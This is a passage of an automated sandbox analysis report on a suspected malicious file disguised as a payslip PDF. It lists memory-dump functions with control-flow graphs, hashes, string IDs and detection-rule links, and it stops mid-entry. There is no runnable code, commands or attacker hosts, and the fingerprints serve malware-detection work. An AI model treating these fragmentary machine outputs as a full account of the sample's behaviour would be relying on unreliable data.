                                              • Instruction Fuzzy Hash: 2CE16C31E1020A8FCF69EFA9D5906AEB7B6FF84304F108529D519EB358DB74D846CB81
                                              Function 0684B760 Relevance: 8.0, Strings: 6, Instructions: 471COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 256 684b760-684b780 257 684b782-684b785 256->257 258 684b787-684b78a 257->258 259 684b79c-684b79f 257->259 262 684b790-684b797 258->262 263 684bb0d-684bb46 258->263 260 684b7a1-684b7aa 259->260 261 684b7af-684b7b2 259->261 260->261 264 684b7b4-684b7b7 261->264 265 684b7bc-684b7bf 261->265 262->259 273 684bb48-684bb4b 263->273 264->265 266 684b7c1-684b7d6 265->266 267 684b7fe-684b801 265->267 266->263 279 684b7dc-684b7f9 266->279 270 684b803-684b80a 267->270 271 684b81b-684b81e 267->271 270->263 274 684b810-684b816 270->274 275 684b820-684b827 271->275 276 684b838-684b83b 271->276 280 684bb4d-684bb69 273->280 281 684bb6e-684bb71 273->281 274->271 275->263 282 684b82d-684b833 275->282 277 684b865-684b868 276->277 278 684b83d-684b844 276->278 286 684b870-684b873 277->286 287 684b86a-684b86b 277->287 278->263 285 684b84a-684b85a 278->285 279->267 280->281 283 684bb77-684bb9f 281->283 284 684bddd-684bddf 281->284 282->276 313 684bba1-684bba4 283->313 314 684bba9-684bbed 283->314 292 684bde6-684bde9 284->292 293 684bde1 284->293 285->264 300 684b860 285->300 288 684b875-684b891 286->288 289 684b896-684b899 286->289 287->286 288->289 289->264 297 684b89f-684b8a2 289->297 292->273 294 684bdef-684bdf8 292->294 293->292 298 684b8a4-684b8a7 297->298 299 684b8ac-684b8af 297->299 298->299 303 684b8b1-684b8b6 299->303 304 684b8b9-684b8bc 299->304 300->277 303->304 306 684b8be-684b8c4 304->306 307 684b8c9-684b8cc 304->307 306->307 309 684b8f6-684b8f9 307->309 310 684b8ce-684b8d5 307->310 315 684b90f-684b912 309->315 316 684b8fb-684b904 309->316 310->263 312 684b8db-684b8eb 310->312 329 684b8f1 312->329 330 684ba9a-684baa1 312->330 313->294 351 684bdd2-684bddc 314->351 352 684bbf3-684bbfc 314->352 319 684b914-684b91b 315->319 320 684b926-684b929 315->320 317 684b9bc-684b9c5 316->317 318 684b90a 316->318 317->263 326 684b9cb-684b9d2 317->326 318->315 319->260 321 684b921 319->321 322 684b939-684b93c 320->322 323 684b92b-684b934 320->323 321->320 327 684b991-684b994 322->327 328 684b93e-684b98c call 68466b0 322->328 323->322 331 684b9d7-684b9da 326->331 332 684b9a4-684b9a7 327->332 333 684b996-684b999 327->333 328->327 329->309 330->263 334 684baa3-684bab3 330->334 331->316 336 684b9e0-684b9e3 331->336 339 684b9b7-684b9ba 332->339 340 684b9a9-684b9b2 332->340 333->258 337 684b99f 333->337 334->278 350 684bab9 334->350 341 684b9f5-684b9f8 336->341 342 684b9e5 336->342 337->332 339->317 339->331 340->339 341->264 343 684b9fe-684ba01 341->343 353 684b9ed-684b9f0 342->353 347 684ba40-684ba43 343->347 348 684ba03-684ba18 343->348 356 684ba45-684ba4c 347->356 357 684ba5d-684ba60 347->357 348->263 369 684ba1e-684ba3b 348->369 358 684babe-684bac1 350->358 354 684bc02-684bc6e call 68466b0 352->354 355 684bdc8-684bdcd 352->355 353->341 391 684bc74-684bc79 354->391 392 684bd68-684bd7d 354->392 355->351 356->263 360 684ba52-684ba58 356->360 364 684ba82-684ba85 357->364 365 684ba62-684ba7d 357->365 362 684bac3-684bac5 358->362 363 684bac8-684bacb 358->363 360->357 362->363 371 684bacd-684bad9 363->371 372 684bade-684bae1 363->372 367 684ba95-684ba98 364->367 368 684ba87-684ba90 364->368 365->364 367->330 367->358 368->367 369->347 371->372 372->264 373 684bae7-684baea 372->373 373->333 376 684baf0-684baf2 373->376 381 684baf4 376->381 382 684baf9-684bafc 376->382 381->382 382->257 384 684bb02-684bb0c 382->384 394 684bc95 391->394 395 684bc7b-684bc81 391->395 392->355 396 684bc97-684bc9d 394->396 397 684bc87-684bc89 395->397 398 684bc83-684bc85 395->398 399 684bcb2-684bcbf 396->399 400 684bc9f-684bca5 396->400 401 684bc93 397->401 398->401 408 684bcd7-684bce4 399->408 409 684bcc1-684bcc7 399->409 402 684bd53-684bd62 400->402 403 684bcab 400->403 401->396 402->391 402->392 403->399 404 684bce6-684bcf3 403->404 405 684bd1a-684bd27 403->405 414 684bcf5-684bcfb 404->414 415 684bd0b-684bd18 404->415 416 684bd3f-684bd4c 405->416 417 684bd29-684bd2f 405->417 408->402 411 684bcc9 409->411 412 684bccb-684bccd 409->412 411->408 412->408 419 684bcfd 414->419 420 684bcff-684bd01 414->420 415->402 416->402 421 684bd31 417->421 422 684bd33-684bd35 417->422 419->415 420->415 421->416 422->416
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465
                                              • Opcode ID: 723eb048ca356e70741ceb1b5503a5338bfc22ce594a5e57178da8cc2e99dfeb
                                              • Instruction ID: 09904757406f001d4c15a68ceb8a2e082dab812a49e9fa046523263e3856ca15
                                              • Opcode Fuzzy Hash: 723eb048ca356e70741ceb1b5503a5338bfc22ce594a5e57178da8cc2e99dfeb
                                              • Instruction Fuzzy Hash: 27027930E0020D8FDBA4EFA8D480AADBBB6FF45314F10896AE519EB255DB34DD45CB81
                                              Function 06849260 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 425 6849260-6849285 426 6849287-684928a 425->426 427 68492b0-68492b3 426->427 428 684928c-68492ab 426->428 429 6849b73-6849b75 427->429 430 68492b9-68492ce 427->430 428->427 432 6849b77 429->432 433 6849b7c-6849b7f 429->433 437 68492e6-68492fc 430->437 438 68492d0-68492d6 430->438 432->433 433->426 434 6849b85-6849b8f 433->434 442 6849307-6849309 437->442 439 68492d8 438->439 440 68492da-68492dc 438->440 439->437 440->437 443 6849321-6849392 442->443 444 684930b-6849311 442->444 455 6849394-68493b7 443->455 456 68493be-68493da 443->456 445 6849315-6849317 444->445 446 6849313 444->446 445->443 446->443 455->456 461 6849406-6849421 456->461 462 68493dc-68493ff 456->462 467 6849423-6849445 461->467 468 684944c-6849467 461->468 462->461 467->468 473 6849492-684949c 468->473 474 6849469-684948b 468->474 475 68494ac-6849526 473->475 476 684949e-68494a7 473->476 474->473 482 6849573-6849588 475->482 483 6849528-6849546 475->483 476->434 482->429 487 6849562-6849571 483->487 488 6849548-6849557 483->488 487->482 487->483 488->487
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 1ea3e1b92cd600c7a8c8d689e96b779aace952b97686daa96a8630bc62059396
                                              • Instruction ID: f6b1721936abdcd8a2e2715192751e4f004f5d092cce04290fbaf26764dc221e
                                              • Opcode Fuzzy Hash: 1ea3e1b92cd600c7a8c8d689e96b779aace952b97686daa96a8630bc62059396
                                              • Instruction Fuzzy Hash: C6915E30B0021A8BDF64EB69D860BAEB7F6BFD5214F108569C51DEB344EB309D468B91
                                              Function 0684D068 Relevance: 4.5, Strings: 3, Instructions: 797COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 491 684d068-684d083 492 684d085-684d088 491->492 493 684d0d1-684d0d4 492->493 494 684d08a-684d099 492->494 497 684d0d6-684d118 493->497 498 684d11d-684d120 493->498 495 684d0a8-684d0b4 494->495 496 684d09b-684d0a0 494->496 499 684da85-684dabe 495->499 500 684d0ba-684d0cc 495->500 496->495 497->498 501 684d122-684d124 498->501 502 684d12f-684d132 498->502 513 684dac0-684dac3 499->513 500->493 504 684d551 501->504 505 684d12a 501->505 506 684d134-684d139 502->506 507 684d13c-684d13f 502->507 509 684d554-684d560 504->509 505->502 506->507 511 684d141-684d183 507->511 512 684d188-684d18b 507->512 509->494 515 684d566-684d853 509->515 511->512 516 684d1d4-684d1d7 512->516 517 684d18d-684d1cf 512->517 519 684dac5-684dae1 513->519 520 684dae6-684dae9 513->520 704 684d859-684d85f 515->704 705 684da7a-684da84 515->705 521 684d220-684d223 516->521 522 684d1d9-684d21b 516->522 517->516 519->520 526 684db1c-684db1f 520->526 527 684daeb-684db17 520->527 523 684d225-684d267 521->523 524 684d26c-684d26f 521->524 522->521 523->524 535 684d271-684d280 524->535 536 684d2b8-684d2bb 524->536 533 684db21 call 684dbdd 526->533 534 684db2e-684db30 526->534 527->526 554 684db27-684db29 533->554 544 684db37-684db3a 534->544 545 684db32 534->545 537 684d282-684d287 535->537 538 684d28f-684d29b 535->538 541 684d2bd-684d2bf 536->541 542 684d2ca-684d2cd 536->542 537->538 538->499 547 684d2a1-684d2b3 538->547 549 684d2c5 541->549 550 684d40f-684d418 541->550 551 684d2cf-684d2e5 542->551 552 684d2ea-684d2ed 542->552 544->513 555 684db3c-684db4b 544->555 545->544 547->536 549->542 563 684d427-684d433 550->563 564 684d41a-684d41f 550->564 551->552 560 684d336-684d339 552->560 561 684d2ef-684d331 552->561 554->534 578 684dbb2-684dbc7 555->578 579 684db4d-684dbb0 call 68466b0 555->579 572 684d35c-684d35f 560->572 573 684d33b-684d357 560->573 561->560 565 684d544-684d549 563->565 566 684d439-684d44d 563->566 564->563 565->504 566->504 590 684d453-684d465 566->590 572->509 574 684d365-684d368 572->574 573->572 583 684d3b1-684d3b4 574->583 584 684d36a-684d3ac 574->584 600 684dbc8 578->600 579->578 592 684d3b6-684d3f8 583->592 593 684d3fd-684d3ff 583->593 584->583 611 684d467-684d46d 590->611 612 684d489-684d48b 590->612 592->593 603 684d406-684d409 593->603 604 684d401 593->604 600->600 603->492 603->550 604->603 615 684d471-684d47d 611->615 616 684d46f 611->616 614 684d495-684d4a1 612->614 631 684d4a3-684d4ad 614->631 632 684d4af 614->632 621 684d47f-684d487 615->621 616->621 621->614 633 684d4b4-684d4b6 631->633 632->633 633->504 638 684d4bc-684d4d8 call 68466b0 633->638 649 684d4e7-684d4f3 638->649 650 684d4da-684d4df 638->650 649->565 651 684d4f5-684d542 649->651 650->649 651->504 706 684d861-684d866 704->706 707 684d86e-684d877 704->707 706->707 707->499 708 684d87d-684d890 707->708 710 684d896-684d89c 708->710 711 684da6a-684da74 708->711 712 684d89e-684d8a3 710->712 713 684d8ab-684d8b4 710->713 711->704 711->705 712->713 713->499 714 684d8ba-684d8db 713->714 717 684d8dd-684d8e2 714->717 718 684d8ea-684d8f3 714->718 717->718 718->499 719 684d8f9-684d916 718->719 719->711 722 684d91c-684d922 719->722 722->499 723 684d928-684d941 722->723 725 684d947-684d96e 723->725 726 684da5d-684da64 723->726 725->499 729 684d974-684d97e 725->729 726->711 726->722 729->499 730 684d984-684d99b 729->730 732 684d99d-684d9a8 730->732 733 684d9aa-684d9c5 730->733 732->733 733->726 738 684d9cb-684d9e4 call 68466b0 733->738 742 684d9e6-684d9eb 738->742 743 684d9f3-684d9fc 738->743 742->743 743->499 744 684da02-684da56 743->744 744->726
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q
                                              • API String ID: 0-182748909
                                              • Opcode ID: 4ac60aaeb77ad259c85af5987a4f94bca4124c885c656c08e0cdaa9672d44b84
                                              • Instruction ID: 685d77cc59f516ad58c85241fde08dee365b25267527fa1ab25bc5ceadca1294
                                              • Opcode Fuzzy Hash: 4ac60aaeb77ad259c85af5987a4f94bca4124c885c656c08e0cdaa9672d44b84
                                              • Instruction Fuzzy Hash: 77625C30A0020A8FCB55EF68E590A5DB7E6FF84314B20CA69D409DF369DB75ED46CB80
                                              Function 06844C78 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 752 6844c78-6844c9c 753 6844c9e-6844ca1 752->753 754 6844cc2-6844cc5 753->754 755 6844ca3-6844cbd 753->755 756 68453a4-68453a6 754->756 757 6844ccb-6844dc3 754->757 755->754 759 68453ad-68453b0 756->759 760 68453a8 756->760 775 6844e46-6844e4d 757->775 776 6844dc9-6844e16 call 6845522 757->776 759->753 761 68453b6-68453c3 759->761 760->759 777 6844ed1-6844eda 775->777 778 6844e53-6844ec3 775->778 789 6844e1c-6844e38 776->789 777->761 795 6844ec5 778->795 796 6844ece 778->796 793 6844e43-6844e44 789->793 794 6844e3a 789->794 793->775 794->793 795->796 796->777
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq$\Obq
                                              • API String ID: 0-4057264190
                                              • Opcode ID: bcc31f2504bfadd8cbddd8fdefc90dc746916915e269c5b9ba11b62c2747545a
                                              • Instruction ID: d500e3876c803bfe8b84d198d13ff4ded354427ab7a6242fd623486790a0da0b
                                              • Opcode Fuzzy Hash: bcc31f2504bfadd8cbddd8fdefc90dc746916915e269c5b9ba11b62c2747545a
                                              • Instruction Fuzzy Hash: 6D615E30F002199FEB54EFA4C8547AEBBF6FB88710F208529E509EB394DB758C458B91
                                              Function 0109EE90 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 799 109ee90-109eeab 800 109eead-109eed4 799->800 801 109eed5-109eeeb 799->801 823 109eeed call 109ef78 801->823 824 109eeed call 109ee90 801->824 804 109eef2-109eef4 805 109eefa-109ef59 804->805 806 109eef6-109eef9 804->806 814 109ef5b-109ef5e 805->814 815 109ef5f-109efec GlobalMemoryStatusEx 805->815 819 109efee-109eff4 815->819 820 109eff5-109f01d 815->820 819->820 823->804 824->804
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492695280.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_1090000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: c!
                                              • API String ID: 0-2715345226
                                              • Opcode ID: 675143fb84a1a63de5beaa5147aa4ecfd8ec1d29b83983b25b8d14a084778270
                                              • Instruction ID: 515c419c21c303e202bafd7f9158028aa57b6522cfb7578d369c2e390721d28d
                                              • Opcode Fuzzy Hash: 675143fb84a1a63de5beaa5147aa4ecfd8ec1d29b83983b25b8d14a084778270
                                              • Instruction Fuzzy Hash: 9C41F272D0035A9FCB04DFA9D8147EEBBF5BF88310F1585AAE408A7241DB789885CBD1
                                              Function 01098038 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 825 1098038-109808a 827 109808c-109808f 825->827 828 1098092-10980bd DeleteFileW 825->828 827->828 829 10980bf-10980c5 828->829 830 10980c6-10980ee 828->830 829->830
                                              APIs
                                              • DeleteFileW.KERNEL32(00000000), ref: 010980B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492695280.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_1090000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID: c!
                                              • API String ID: 4033686569-2715345226
                                              • Opcode ID: 96ec879ffb5ec30c334e6b14c30632ccc13e7e48a000c82ef862389fc5458b48
                                              • Instruction ID: f02b11bfd78b0c72886a4310f8346717c014cb5d917d9944be037d6196d236f4
                                              • Opcode Fuzzy Hash: 96ec879ffb5ec30c334e6b14c30632ccc13e7e48a000c82ef862389fc5458b48
                                              • Instruction Fuzzy Hash: 782124B5C006198BCB24CFAAD544B9EFBF0BF48720F14855AE858B7350D379AA44CFA1
                                              Function 01098040 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 833 1098040-109808a 835 109808c-109808f 833->835 836 1098092-10980bd DeleteFileW 833->836 835->836 837 10980bf-10980c5 836->837 838 10980c6-10980ee 836->838 837->838
                                              APIs
                                              • DeleteFileW.KERNEL32(00000000), ref: 010980B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492695280.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_1090000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID: c!
                                              • API String ID: 4033686569-2715345226
                                              • Opcode ID: 427cb7a32c18d3c1961293bfb830ef23adfcc06b9725a02d1de1eed6ef22ed19
                                              • Instruction ID: 8009d916269e7aca438a7df274863f95c6bf00a65c179abc6e4c669577d576ea
                                              • Opcode Fuzzy Hash: 427cb7a32c18d3c1961293bfb830ef23adfcc06b9725a02d1de1eed6ef22ed19
                                              • Instruction Fuzzy Hash: CE1124B1C006199BCB14CF9AC54469EFBF4BF48320F10816AD958A7340D778A940CFE1
                                              Function 0109EF78 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 841 109ef78-109efec GlobalMemoryStatusEx 843 109efee-109eff4 841->843 844 109eff5-109f01d 841->844 843->844
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0109EFDF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492695280.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_1090000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID: c!
                                              • API String ID: 1890195054-2715345226
                                              • Opcode ID: b514fc1ad3a015d29afaecdc255362c6eb0deec7cbbec29a8f9743daafa1e4dc
                                              • Instruction ID: 4ef63f8e0e35469947d7912e34ab831b499b6071b9bac3df05343106e5de246b
                                              • Opcode Fuzzy Hash: b514fc1ad3a015d29afaecdc255362c6eb0deec7cbbec29a8f9743daafa1e4dc
                                              • Instruction Fuzzy Hash: 7E11EFB1C0065A9BCB10DF9AC944B9EFBF4AF48320F14856AE918A7240D778A944CFE5
                                              Function 06849252 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              • Opcode ID: d96271443cfebfe76855bd0bc7bab2f4154239da3d774d8c846cddcbb12ce850
                                              • Instruction ID: f5fc6a33b2fdc844c2fe9969add0fe98e64bc880a1b203c906d296b5a5c7d478
                                              • Opcode Fuzzy Hash: d96271443cfebfe76855bd0bc7bab2f4154239da3d774d8c846cddcbb12ce850
                                              • Instruction Fuzzy Hash: C2516071B001099FDF64EB79D860BAEB7F6BBD9214F108569C419DB388EF309C068B91
                                              Function 06844C69 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq
                                              • API String ID: 0-2292610095
                                              • Opcode ID: 9ae0c97ad9bb3ee8da0adbf83fae5ecf7b6f98447a412afcc26c4b5f254b0bcb
                                              • Instruction ID: 15d82fa2d3c5138f00505c687b84d34351a230838c10edb0543f40a8da931116
                                              • Opcode Fuzzy Hash: 9ae0c97ad9bb3ee8da0adbf83fae5ecf7b6f98447a412afcc26c4b5f254b0bcb
                                              • Instruction Fuzzy Hash: 0E515E71F002099FDB54EFA4C4557AEBBF6FF88710F208529E105AB399DA758C018B91
                                              Function 0684DBDD Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: 7e756e535c9e181e6beba00951e682accb50efe8066d67cce60fe94ac4eba49c
                                              • Instruction ID: b034c19a01bb98d5b48eb9dcc4bca8607303f537bcc306083c2652fa85612780
                                              • Opcode Fuzzy Hash: 7e756e535c9e181e6beba00951e682accb50efe8066d67cce60fe94ac4eba49c
                                              • Instruction Fuzzy Hash: 2441AF70E0020E9FDB65EFA5C4946AEBBB6AF85300F10852AE501EB344EB75D946CB91
                                              Function 068421BD Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: afc5a3e84f86beb0292e1c8f617e1baf0431252fd54359f9acd0648f0ce7f151
                                              • Instruction ID: 3167984d5ba6ca07f3d465f6ea6c62ee10147eda4735cf8847a7f35e65320b0e
                                              • Opcode Fuzzy Hash: afc5a3e84f86beb0292e1c8f617e1baf0431252fd54359f9acd0648f0ce7f151
                                              • Instruction Fuzzy Hash: C7314230B142058FDB59AB74C5647AEBBE7AF89210F104578E406DB389DF39CE02CBA1
                                              Function 068421D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: 84083353011fa92b7e11605005892e4575a2846f74c40703855c63e22924c419
                                              • Instruction ID: 4982ccb3f31e112f61c0bf50362c6f576c7a0065eaa8684838ef485cb5d43d0b
                                              • Opcode Fuzzy Hash: 84083353011fa92b7e11605005892e4575a2846f74c40703855c63e22924c419
                                              • Instruction Fuzzy Hash: AC312430B142098FDB58AB74C52066EBBE7AF89210F104538E406DB398DF39DE01CB91
                                              Function 06843D92 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: c!
                                              • API String ID: 0-2715345226
                                              • Opcode ID: 1e7df2b8ee61e6ec94ba939d963733964cfe72289ee34286fa735d30f683219e
                                              • Instruction ID: 3f1b937a795b15687b46f1ae342f90c70f4fd0351b18959da30abcd59cdeef27
                                              • Opcode Fuzzy Hash: 1e7df2b8ee61e6ec94ba939d963733964cfe72289ee34286fa735d30f683219e
                                              • Instruction Fuzzy Hash: AA21C2B5D01219AFCB00DF9AD884ADEFBF4FB48310F10852AE918A7200C378A954CFE5
                                              Function 06843D98 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: c!
                                              • API String ID: 0-2715345226
                                              • Opcode ID: cc5ab886158a27d7e230029a536c295ac347ad307505bd4d95ecf54ea1fac336
                                              • Instruction ID: 4c72592f156974f2882329e6c72139d3b5451266ed5fe72a3be67344061f4324
                                              • Opcode Fuzzy Hash: cc5ab886158a27d7e230029a536c295ac347ad307505bd4d95ecf54ea1fac336
                                              • Instruction Fuzzy Hash: 6A11B3B5D012599FCB00DF9AD984ADEFBF4FB49310F10852AE918A7240C3786954CFE5
                                              Function 068483E0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q
                                              • API String ID: 0-1007455737
                                              • Opcode ID: c1808e497fcfa51c5ea1839c57130d4071ab60fc974bf962016262e88b67df14
                                              • Instruction ID: 10d8d403718eb99b4d7dbc65c438c322d3468f69dd5a6f9015f302881fab341e
                                              • Opcode Fuzzy Hash: c1808e497fcfa51c5ea1839c57130d4071ab60fc974bf962016262e88b67df14
                                              • Instruction Fuzzy Hash: 06F046B2B0011D8FDF78BE99E9806ACB7ACFB403A4F148425CA05CB204D735ED0AC781
                                              Function 06844B61 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Obq
                                              • API String ID: 0-2878401908
                                              • Opcode ID: 1d3a02a9ad5e4a3a335ee8f77f0c814f7b1830ef29f9df677abc119e3850264f
                                              • Instruction ID: 2b3487be1479b9ec4c9d19a832f8fabb400d94c125552e1d666ba4b43142c304
                                              • Opcode Fuzzy Hash: 1d3a02a9ad5e4a3a335ee8f77f0c814f7b1830ef29f9df677abc119e3850264f
                                              • Instruction Fuzzy Hash: 52F0DA30A5022DDBDB14DF94E899BAEBBB6FF88705F204519E402A7394CBB41C01CB80
                                              Function 0684C2A8 Relevance: .6, Instructions: 636COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a6271687f355766d756cfa0eb7fbf631833401521c2cf19e66d24e900571b7c3
                                              • Instruction ID: 1985c5c573c60e41b25d0925b12d9be8cda2434f0a54f02d206e5fe544272f41
                                              • Opcode Fuzzy Hash: a6271687f355766d756cfa0eb7fbf631833401521c2cf19e66d24e900571b7c3
                                              • Instruction Fuzzy Hash: 7932A030B112098FDB64EF68D990BADB7BAFB88314F108529D506EB355DB35EC42CB91
                                              Function 06846300 Relevance: .2, Instructions: 229COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 93078fd54e80e2a5b340e7df395c95dadf5d299466aaff7cc5a799f980e31fbc
                                              • Instruction ID: e6024b747f75b1ad237116a000b8ca0d09d00a175b8b8462e30529c82775710c
